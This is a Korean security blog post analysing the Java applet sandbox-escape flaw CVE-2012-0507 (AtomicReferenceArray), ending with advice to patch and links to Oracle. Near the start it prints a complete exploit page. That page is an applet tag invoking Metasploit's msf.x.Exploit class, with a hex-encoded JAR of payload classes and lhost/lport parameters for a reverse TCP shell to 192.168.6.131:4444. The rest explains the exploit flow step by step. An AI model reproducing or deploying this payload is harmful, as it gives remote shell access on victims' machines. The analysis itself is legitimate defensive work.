본문 바로가기

[+] Security/[-] Analysis

CVE 2012-0507 간단 분석

얼마전에(정말 얼마전이죠) CVE 2012-0507 취약점이 발표되었었습니다. java 애플릿에 대한 취약점이죠.


현재까지도 해당 취약점을 악용하는 악성코드가 지속적으로 출몰하고 있는 상황입니다. 


빛스캔에서 발간하고 있는 악성 코드 동향 분석 보고서에도 보면 아직까지 해당 취약점이 언급되고 있습니다.


관련기사 : http://www.dailysecu.com/news_view.php?article_id=2243


한동안은 계속 해당 취약점과 다른 취약점들을 이용하는 악성코드들이 계속 나올 듯하여 그나마 "이런 글을 보고 패치하겠지" 라는 바램에 이렇게 분석/정리하여 봅니다.


일단 해당 취약점을 이용한 악성코드가 심어져 있는 페이지에 접속하면 아래와 같은 java 애플릿 실행 여부를 묻는 창이 뜨며 그 페이지 속에는 다음과 같은 코드들이 들어있습니다.



[그림 1 - 자바 애플릿 실행 여부]


<html><head></head><body><applet archive="dvTKbJP.jar" code="msf.x.Exploit.class" width="1" height="1"><param name="data" value=""/><param name="jar" value="504b03041400000000006cabb1400000000000000000000000000b0000006d65746173706c6f69742f504b03041400000008006cabb140aecf34d0e511000063220000180000006d65746173706c6f69742f5061796c6f61642e636c6173739558097c1c75f57f6f767667763239bae9b69db6810269d9e6d8406943bb2d85344d694a2eba81100ab693dd49b374b3137667db1410510a28788b62b9a96804054baa9b403854b408a8a0c8e9f5f70029a7a2221ed0ff7b33bbc96eb245cce793df6f7ed7fbbde3fb8edf3ef6de7d0f820bea85260536c25f24784b82bf2a7013fc4da1e9bf2bf028bc2dc13f1490e06d2f5c02efc8f04f85fa7f49f06f0554789b8ffd478193e15d1ebe27c361ea1164445a41810ea24b4111dd327a7820c928cbe855a00a156e4a2454b92f95b18c7abeb20acbb9a9a07b7096823eac947136cff8793047c6b932ce635a9a82f371015d8e0b795825e351bced686e1649788c0227e2b1321ec78bd53c702bb818974878bc8c01a6be54c61a9eaa55b00eebb909bac1fe939e54b0014f604a2766a7204a0ac065dc9c24e372195748d8e8c59371254bba4ac2100f562bb8064f9170ad8ca7ca781ad36c92701da9149b655c2f638b8c1b643cdd8b1bb1959b4d329ec122b449d8ce7d878c9ddc7729701e9e29e36609c30af4b162fab05bc6b3643c9b79e891f11c057b896d9a3f57c22d0aec205be1790a0ce2f9127e480113b772b38d1b374fd773a34bd8276344c6a88c860269ece7663b370312c6d8ba6fcb7801eb67878c7136de202b2f21a1a9c0e53824e1850a5cc1772515b88a217005a624b4244ccbb853c25d0a5c83c30a5c8dbb79ff45dc5c4c48c24bb8f9b08c97b2c23e22e3652cc74765fc18f797cbb887fb2b64bc52c2ab24fcb80237e327587157f3fc35dc7c52c64f31639f96f133dc7f56c6cf71ff7936d41724bc56813b99a14bf08bf4855ff2d2f4752cd99765dccb5abd5ec61b14bc116fe2e59b79f916c6ebad3c771b7fede35d5fe1e6766ebecacdd7b819e1e6eb32dea190d1242fde89dfe0996f325b77c97837f7df9271bf8cf7c8382ae10104a933bcb5a3a9bd05c1d77681be536f88eb89ed0d612b194b6c5f4d3ed2d5d4bd716bb8a50bc1d31adedad47a0e029eeb0cd6778611bc9b9ace6edabab19329cc8bc4f554aa7ad0b0f4d450dc8c59d55dfaeeb8a9471166e5116fe65d44db1bde9db0060c2b16a1cb9da3bca93a66566f88c50d8485799309c3aa3e6b735bb3994818112b662610aa0acfacd72dbd353194b68879431f44985fb8de99b6f216e7eac9a4bebbda66ab9ad9aa766426d1d6c412316b2d822bb0f46c04b1d98c122fe2a01ea33be704b6cc54136f535a8623c6103396226977256396d132d86744a346d411667960860a665272666266039f21ba127e5bc2ef90aafa4cd34a59497d08211c98dc9527eed4d17c398b5c7104fe2bb61bd6a6a4d1326c44d296dec71c2f0914d95a0c24aa1e8db60c5b462265dbc5db1f4b445b13eb63c96952170859846a4e6e22913093837a3c7611b1716ce0031c90a2b1548a8081707cb1ed5b8ab1ed71f081b0f8bf089a03acbc2612b7b1a16206de4458346d4b87696d30d389e82414108e9adad261da9bd61bfdcea664d24caa3886e32a3c8ff752032f20ccb6f7a7ad58bca12b690e19492b66a454f819fc9c7c64cab18259c752e10d6664ce74f6d7a5fbfb0da27e1f51c709bc5fc507f0419238688bace243388e50de904730aa5b2a7e17bfa7e2f7f161097fa0e20f991f650a102a1e849788c6a5a9217d17892606adc121151f81432afe081f2518e4db44c5c7f80e31188d111f8fe3a32ce58f55f82dfc9f843f51f1a7f804f9c97a9271c888e65ff224b3fc332479dd61e7223c81aec6a724fc858a4fe3332a3e8bcfa9f83c127b65d325f825fe4ac55f3337f3f2b9c9f70966e4370814477f8bc4cbef54fc3dfe811c60ba0e89799e52e145165ba9b75537a45b032afe115f94f02515ff842fab78085f96f015155fc5d7547c1d5e50e109f8a90abf6093d92a09c6cca013034a538695ef61e5d30024e11b2abe093f57f1cff89702963afb2e2074abf816fe55c2bfa9f8777c1be1e87c7085d3918176c31a30f3e1e78e0c0c9a147e85da6115ff81ef20544e9d99dca7e23fd9d6eeb6aececddd24f672fae3e1c6ce300d5d147625fc978affc6ffa8f82ebe473b92faae908a8705a0209dd3f3badd96d1c441352f2aa902e273a4bcd67067fdca952b56d59fa80a82e0221308224169c0b28652a11c7228c437d05daae0163ce43933d1de9d4ca7ac763da16f3728b478d2296303b9103ccd9ab65d2048248205594212245590f165ca1633f82c4c08e5933c84cdc80ec3621ebd08fea96923b9d3484e2d2aaa5022a8aa502a942168537eeba0a7dbdc6124287e11a32559f617d5d72fa27bc216f1dfa5277512d04852b6c0454cae5c152af01d5598c56e93e7ea0d9339b43497506c0a2afc01fe48871b54c12754aac26cc14f592d27e4b464c8987f38c725c5c934e5a7dd0d5d467290c2a693b31614ae35c5e353cbaa3047989b0b6653c793a6e56879bde964c779851b387386cd7432425097fbc903420d0d0d33c84428c8353473a4eb8f4574cb6065cce3465385f9ac910582a80a0b852a55384a389a74c3c7871ca50453ac8aa02a2c128e21c4d22849b67986013137e77a3354f12c2fcfce2d178686e778add2491741f692e064bac8f39cee81a4b9cb71e1ca9cc6bb68db94b68563c9a984e354f809c78227e171f2a386d4800a2fc321f29f86be5842853f71601183c630c9fc0abcaa0ad51cb8caf3a1a44776a8f01abcae0a8bf1095558028fabc2f1bc0b49e880b0945c3b1894841a55a86555d509c7a842bd10a4782f10304e104ee4af65aa7092b09c7c5158a10a8dc2c9aab09237af1242bcc0d9d34c051384474958a30aa7086b55e154e134151e63b6cb38e40553c61021d66277fbb12d8c1e1b26263855dbaa1a30078d9cb34cc5b33632117b40557e2c2e92252795d8da99372bf59bc90e9de92a549cb41ba914d99a2c17285a84f803c50b1b89ce3a54a4a43114d7198c7302cdcd458978744a4709f2b5ba0f54fb3869962b03cbcc258d4aba6fb391b261df94ca4597a5ef5bc4e4d7718408c7dde715aff358a6ca220b1cece3668aa42b210eb2c5c36eb25f84562da3db181c729290276ac429f2d8f52d55f2e5b4bba92f65c6d31645256b80e80cee8872ed765ca0b0ca2aaedfca29b86ed45303d9cce6491a83e6cee945a493c50a14999d720ad0663d61262808c41d465c241cc2ca22143e20cd95ff4bf5598884595373ad09cbb0338e4c3e9032687804b4b512c676eaf1b4d1d9cf3b5a8b122e49e55be77fe77052b85236b39e34129663d78ac08caad8635b921f2481e92f0b3b5a9a493a571bf8a04f073e95a797cde98415cbb9e7e4c05fe09ed969463585397ae8058a3ea0f2a6483711c32eb767cd982434d35505a09f1b38921bf156bbc8ce6dad2808e006fb983b15370c7a5389814d2c9ceab84667a26538661530b0ce34e386ce556f776f173d75bd7644e26a0be1b4c0fbbfb29ce743be8c49a33f4e466c7028b072ba379f45542bdb66dcb83a97558b1c2403c7123ba9d0405855c449b67c402f9176e9310ac9493b221086cb879c5446b9a73b69c7cbfcda7877ca32489902e77bff1154ef32d971a756f37223ad2a769a4ef5c4d8c78b3a1285256f2add97ca86549994cd555b8a2377b1d7dd3ab26460cb3a366119795622ff5782f9398064cbcba9b5d5b987d38c15e291c9e48053ecd256fbb78180dd79f408272db25ffe5d4ea5b8da89b085b5e6bc3cd016f85cf1e76b714f2c895016b5ec3a33c52f6663d8197079ee809b5542f674dbbf46909d69dc6a33eca2073b65e5ec5545ea41fb82658102c5e5f074c4c2cd3ed4349de85411b8fa88d7359bf178d62676ca66feed30ebe5af0de9789c426549d4e88f250cdb9b105a8b391d89d7f6fe356ad177bd9aa47c1ddf99233d7be62f35b6be13c6aed6046137119951854cfa92768460ca04f2127abe43d808328663298bee1687d2a901467faedea2383fa0a7da2952e72ced312e4cebf1d434d7c939f8b9396fb533f2d934c734c494fd538a6bc81cb25fa159e2cd033a2d623355ff81e6f7296fbc14160729d1345933f2daa4e475ff25d14f2329c51251639813253b512b3b59eb1112a665329ff6938d772fdd42fc7ae246623bc70f4f84d72c874c3383bed52697a78436932a0ac67f4bc7e96dade18d933f75e6ad3af7b499bb8c64b39ecaab5bf2f714610f8e814be051002881f95c2fd3d77cae90ed9e6a7fbb7f22db3f69cfcbfc6b0e3d9c9fb27fb097f98782bcd1d305a3670a46cf168c9ecb1b95d0d7f3f002b5bfa4d12cea917a77cd1878eeb13778e157f06b1078592c0389b680ebad09907ac7406e1b05ef2350ee53c6a1a4f7007847c04333ed13a0d26a695d06ca2a82150d1928cf40856f163519f075d4f92a33303b246ae24128abd5c40cf8b99953eb9b9b817921b7e63e08db7c9a6ffe382c0879344f0616f64c40556f962a4f1cc5f48e76e88dc1a290a4491938c6dea5499a7b0c8e0dc9759a5b93c7e1389b6c754fad6fb126676049068ea7ef806f69066ac6a1b6d1430b7cade4f7dc8c0b69c5ef11a3e340bcd7f7e49890f9642113f24c26bcf6f55e5f90af579c413d7f97682519202d9cd05357af95104b137062afa68cc1b2905aaba9be9332b05c5333b0621c1aa507e0e45e976fe538ac0af78abe50b8d7ad79e9ae70af87d519cec0ea50a9569a8135a431ee4fa17e36ac1d87d3e86855af4b2ba173f6857c54a1739a371c2a733596fbcbb5b207f7c10a576385bfa242d9078bb5327ff932926c2f7846606e76d4341bd611b53d153872f8853de5d43e3a22b834e920dce8e89765954761fdf51019851636ff06c7fc2db6f95b7ca78b0fc0c65ed728b412bb9b34998667f0b08d86ed3d23a4112f49ea7124ed6431bb98578985cbc099b443097959ea306d13ed6dce628f7dabcfb106b70dfc318246adafdb7756d6a072adef6ca4ef90b7d6d7637f287ef926a81885734225a3d01b5247e0294d3908d76a8aefdc0c6cd90bf327e03c320861e87cdf8732b0750cb6854a46603b6dd0ed0d9d13d0675b2c928168a8d4678c03fafa73626e671d0c383ad86eeb603b0b8e8edc5aa92d36db2ac65467e5d1ba205432013b085071e6ea14cd7b102a27609080e397c720112a1d61decc5e1e0d85cab4b20c5c48e6a72ec9f452042deaac903a01e91c347d3b0992b5be5d0cab1a079dbee131d8edc0e62252673e1a2ad9eabc7071d8b6f5ab13700951f9b056a2a9b5be4b597f5ad9187ce41e100449582dac850eeacf17b6c1668a0dbfa17f9102c66650f8e759274ac059342751df5a9363e93266c9e1855cbf83f15fc7f0176755c0fd72c85dafb933f0d1de468f700b5468a2e676f9c9cb3f3672f8104786154e20e2cb3c74c5efe0f7e0e39fb09ceb70295d5642bd7f022eefad1d833d21f7045c41f75ec9716102aea2cf8f67e013137035e9e89a5ed6bfef93a47fd703f0a931f83423fa3321b9fe1158c56c7cb6d1ebf712530ac50f25039faba9414d71f9bd8cb7cff78688af2f4c6ebbe9f0b323b02027e5b52461bd2325e1c3095d5f24247b7c5ff264a1721d43e5cb0e54aeb3a1721de17f14f6f2fcf5cefc5e7b7e2fb9c428dcc0f3373af337d8f337d83ee5f538d872d3e93a761e31eb5b3e8e9f137033ebf7960cdc7a0f877314d00d374db3d78bf05236e89f4b8a14a8ef408ae7b7ed85aaac40a3b08f43dc571c91c8b96e6fab7d64faea57f3570f824c663e6a3f8dbeb6df369ac23f5565efa905c14e2e476729303ac9a3f782ec1b190137039649e50ebe0c87b2079711d322f54b88eed7dbb18322e11d7b41e37054574b575190ed20c5df713db8b1a33e77fe1578357bfe5e3aeda1feae09b8932efe461bd1f9667b6d9d8bc2dd5d3dec3b75e2b251b89bbc84e97c6b2f3453777148f4ed67fcddc3f1f1f021df6876b090643ce0de072a33408972d17e9af836872d3b9bddd53372f8feac8821d1d5e8f6bbf9c03ea8f6bbc5db41d5c8dedfc940a647136bfd84a4b10c8cf7ec7193f33d6f0758d1c92739315e83d71d31d04b62c834f72e9d5f5353d1b080126bc579dc9e81ed3515a10cdcbbb6ea66b8d2d6e96555e2b646b1c6e52772f7b593aa27d82d7279b9824e65e89e76cded17972fb81514bf286e2323f8c54631c7bb8706929ff229c589006d947863197f88d1e50b6ea14f8f3dcbb2ec9188ff6718f1be3346e04cbaef7e92f5d41abafd013ad558b380247d90185ac017d99f7ed17d3b9433873c71df088835ed35c4dbfd1486890601ecee763e7ffe196e3b0710cec59af0fe6c0df306bc990d374bc065c3973188fbdb26c0d54bfa16c7c0fd900d3711dcf67aaefaf9f364b5d364cf03acf03d340edf1d85ef65e0fb07e061df0f6874007ee83b380a0f93c50fc06da3347ac4fe5ceffb91bdbacf094af0ff504b03041400000000006cabb1400000000000000000000000000c0000006a6176617061796c6f61642f504b03041400000000006cabb140000000000000000000000000120000006a6176617061796c6f61642f73746167652f504b03041400000008006cabb1402600ec319c000000d30000001d0000006a6176617061796c6f61642f73746167652f53746167652e636c6173733bf56fd73e0666065d062e76067676060e4606d6e292c4a2124606570d9facc4b244fdcc7c7d97c49244cfbc82d292e092a2d4c45c6bb8847f690942341a229c939897ae0f14cacc4bb7d60c6364e072ad484e2d28c9cccf2b6667e064641007a92a48acccc94f4cd107da959e0a540d2419190410fafd93b25293818e104608c18d616364606460620001461646a0e359807c56200f44b331300000504b03041400000008006cabb140ea1e3cba14030000ea050000270000006a6176617061796c6f61642f73746167652f53747265616d466f727761726465722e636c617373a5544953135110fe5e16868c838425c88eb8603221c40d5436954da36c0282e0694c06180d99d43011fd297af1c8992a08945872d32aff8337ff8177b17b324028d12acaa4aa97f7beeefeaabbdf7cfbf5f133bc88615e462d3a64c47155c6355c67eb065b37d9ea64ab93215d32ea702b40d66d16775874b3e891d0cb803e09fd3282b82be32cee49b82fa30a031206d91f626758c2888407021e2323101a7da9bdd6e286194f64b2397bdab6746da547c06be66c819ac3db899c5d7c5db66a6bc957339696d42718589a4c9bab05532c08488ba6b5a65929818ef089054ece1b9915f00d9a295d401e7e93d4b3b6616656253c14889f26cf02272ae9353286dd2f30749ad0bf131bfeff340e2faf95a3be7bc36c2bf6b265aecd595a36ab53b36add12692db3149fe12bed455aa7ea0a5ad12621a1e0111e4b185530867105139854f0045105532cae20c282ac7a34286844938266162d382f5075426a05ed881d5c11db49cbc8b86439d3b482193c15a83f0a9dca656c63453f9c0ec32843c31162dc9cce2597c7747bd94c0d5b96692998c51ce39e09b4322eabbd4d9b5a2a4e3bb4a4c70be5460a0ba35b02c16344752d554430317158b9f8f4681eb44085107ff8f9402421507dd224e87acd326cda3389608904cf22403823cd5d71a643a1fec5746e7599b4b3dcd486f03fc65a9e2df4eee0591c4df3785f9d5d2ab54df28ccc12f10b478a865e38a507160aff791a99a535a8a50f00e043250f99ac4a9eb3a39b5d4dd3265d8200a12fc0838be455d157c6435a52a3be1d880df0ef929348e0b2036d73a1069d95901eab08e253e9b81acbc333dfe5f37c4053f4cbfecf68cc1bf2e5e155f3f0bddfff11cdc3bfbeff9dbc92c6776820575a4775b7df3d90f8a0cebfb7e1546f470fc91ef439ba9880a0f50893640221f8e91408a8d1f6986f1ba505b60c89b810e6ea275daf6e336c0bb2dabe85336a6c0b8a1af26da1ec204645d48d19a4082611573709be49e84d94512fd6d1324aa6f295c8eea03cba8be03cfb54b9228fca0d0a07caa9af6749cbfc60dc84aadbd39a5d54cd1391eabd51c7caa3661be7f69cb800fd43cce437504b03041400000008006cabb14029f4dc1882020000d30400001d0000006a6176617061796c6f61642f73746167652f5368656c6c2e636c61737385545b53d34014fe96a66c09914b0125def182012af18a4a1154288aa2458a3a0e4fa15d4b9836e9248b8517ff8a8f3efb52181dfd01fe28c7b394d216339a999ccdf9f6ec77be3d7b36bf7e7ffb8918aee38d8e93b8c0713181111d9770594707ae2470558da3095c4bc0d2318671652638523a2d9ad461c0d6710337957b4b99dbcadcd17117533aee618ae33ec7038e6986ce19d773e52c43cc1a7bcba0cdfb05c1100fa51348868cb5bce57c746cd7b7171ce92c79956d99938170cae9a389ecb66ca2eb75b8e478459b20d72ba615ad9ed9c98b8a747d2fe4481b1886c9d0773c9481fbe1a4e79405c78c8187983530874704575dafe05743038ff184dc7cb93029764827b7375ccf0e3739e60d2c206360114f19461473c5d92df94ec1a6ad14855dd7b7e8075527288880e39981253c57525e702c1b3803d3c04bbc3290556605af39560de46072ac319c8aa0dc14a552db36b21b5b222fa38395651868061f95a4bd12bba1146586eea2902b815f1181dc6518b522eafa3744cba4bfec574530ef84946dd08a0ce2544db193fdc03014c5bbc4d0df4457b73de996894c274547ce501bf3214cd41a1d4b9ec1b2d6ff2d98b6961761986e4b750832f452aad6b662186ee43bde700c0bcd1efd7f7f46a3aa455bce606d93d002430fc968a1a4736d51d19aab1e9a09023f6884f2aae34a6ab7838b4515351beb16dd9214411b6d3c5ff20f8e2b4a1c463044bf014a0ed0b567eaee903d4d5e3f8d8cc6f8f81ed857a887511f9fa53035fd097174d218683fd031ad2563fbd06a88273b6be01d9f61985a2c99c87d4197fae8caed433769be7b3afe1dc6fb09335ec389d41e7a6ae85580f2fb52c780fe06a09ce4bb891a0652350cd6b59ca3572345e7813f504b03041400000000006cabb140000000000000000000000000090000004d4554412d494e462f504b03041400000008006cabb140ae74567e72000000da000000140000004d4554412d494e462f4d414e49464553542e4d46f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5f24dccccd375ce492c2eb652c84d2d492c2ec8c9cf2cd10b48acccc94f4ce1e5e2e5f24bcc4d4596d387cae92583742154642596251640a4f48b4b12d353f583412431ca8a521373ddf28bca138b52528b88d090919a9383500600504b03041400000008006cabb1402528e75633000000330000000e0000006d65746173706c6f69742e646174f3f1f00f0eb135b434d23334b3d033d3333436e4f209f00f0ab13501022ed7dca4d49494d494e092c4f454dbe08cd49c1c2e00504b010214001400000000006cabb1400000000000000000000000000b00000000000000000000000000000000006d65746173706c6f69742f504b010214001400000008006cabb140aecf34d0e5110000632200001800000000000000000000000000290000006d65746173706c6f69742f5061796c6f61642e636c617373504b010214001400000000006cabb1400000000000000000000000000c00000000000000000000000000441200006a6176617061796c6f61642f504b010214001400000000006cabb14000000000000000000000000012000000000000000000000000006e1200006a6176617061796c6f61642f73746167652f504b010214001400000008006cabb1402600ec319c000000d30000001d000000000000000000000000009e1200006a6176617061796c6f61642f73746167652f53746167652e636c617373504b010214001400000008006cabb140ea1e3cba14030000ea0500002700000000000000000000000000751300006a6176617061796c6f61642f73746167652f53747265616d466f727761726465722e636c617373504b010214001400000008006cabb14029f4dc1882020000d30400001d00000000000000000000000000ce1600006a6176617061796c6f61642f73746167652f5368656c6c2e636c617373504b010214001400000000006cabb14000000000000000000000000009000000000000000000000000008b1900004d4554412d494e462f504b010214001400000008006cabb140ae74567e72000000da0000001400000000000000000000000000b21900004d4554412d494e462f4d414e49464553542e4d46504b010214001400000008006cabb1402528e75633000000330000000e00000000000000000000000000561a00006d65746173706c6f69742e646174504b0506000000000a000a0099020000b51a00000000"/><param name="lhost" value="192.168.6.131"/><param name="lport" value="4444"/></applet></body></html>


공격의 간략적인 흐름을 보면 페이지에 있는 쉘코드가 dvTKbJP.jar의 exploit 클래스로 들어가 실행되게 됩니다. 물론 해당 쉘코드는 제가 만든 reverse_tcp 쉘코드 입니다.


이제 dvTKbJP.jar 파일안이 어떻게 되었는지 살펴볼 차례 입니다.


일단 해당 취약점이 무엇을 이용한 취약점인지부터 살펴보죠.


해당 취약점에서 이용한 것은 java에서 제공되는 AtomicReferenceArray 클래스 입니다. 클래스로 넘어오는 인자(원자변수)들을 배열로 핸들링 할 수 있게끔 하는 클래스인데 배열로 핸들링 할 때 역직렬화를 시켜 메모리에 손상을 주어 샌드박싱이 해제되게끔 하여 악성코드가 샌드박싱을 벗어나 실행되게끔 합니다. 정말 교묘하죠 ?


그런데 더 중요한 것은 역직렬화가 논리적 결함에서 벗어나는 행위가 아니라는 것 입니다. 그렇기에 클래스는 정상참조를 하게 됩니다.


이제 코드를 한번 살펴 봅시다. 코드는 심오한 취약점에 비해 정말 간단합니다.


[취약점 분석]


1. 취약점을 이용하는 악성코드가 심어져 있는 페이지에 접속하게 되면 jar 파일과 쉘코드들이 조합되어 실행이 됩니다. 일단 실행이 되면 jar 파일의 exploit 클래스의 아래와 같은 코드가 실행됩니다.


[그림 2 - AtomicReferenceArray() 클래스 객체 생성]


2. 객체가 생성 되면 ClassLoader 클래스를 생성하고 AtomicReferenceArray()에 설정하여 줍니다.


[그림 3 - Class Loader 설정]


3. 설정이 끝나면 여러가지 부수적인 정보를 설정한 뒤 Help.classdoWork() 메소드를 호출 합니다.

[그림 4 - 부수적 정보 설정]


4. doWork() 메소드는 새로운 클래스를 하나 정의하며 정의 된 클래스에서 ShellCode를 다운로드 받아 실행합니다.


[그림 5 - dowork 메소드 일부분]


전체적인 흐름을 그림으로 그려보면 다음과 같습니다.


[그림 6 - 전체적인 흐름도]


그림은 자세히 표현하지 않아 잠시 헷갈릴 수 있습니다.

Exploit.class 와 Help.class가 jar파일의 클래스이고 샌드박싱 내에서 실행됩니다. 여기서 임의로 정의한 defineclass는 샌드박싱 밖 영역에서 실행되게 됩니다.


해당 취약점은 심각한 취약점이므로 해당 글을 보시는 분들은 아래 링크로 가셔서 해당 취약점을 패치하시거나 최신버전 업데이트를 하시기 바랍니다.


취약점 패치 : http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

최신버전 : http://www.oracle.com/technetwork/java/javase/downloads/index.html



'[+] Security > [-] Analysis' 카테고리의 다른 글

Yszz 0.1 난독화 등장!!  (0) 2012.05.17
Android Tigerbot-Spyera Analysis  (0) 2012.04.13
Android.Stiniter_TGLoader Analysis  (0) 2012.04.12
Encrypt By Dadong's JSXX 0.41 VIP 샘플 분석  (2) 2012.03.10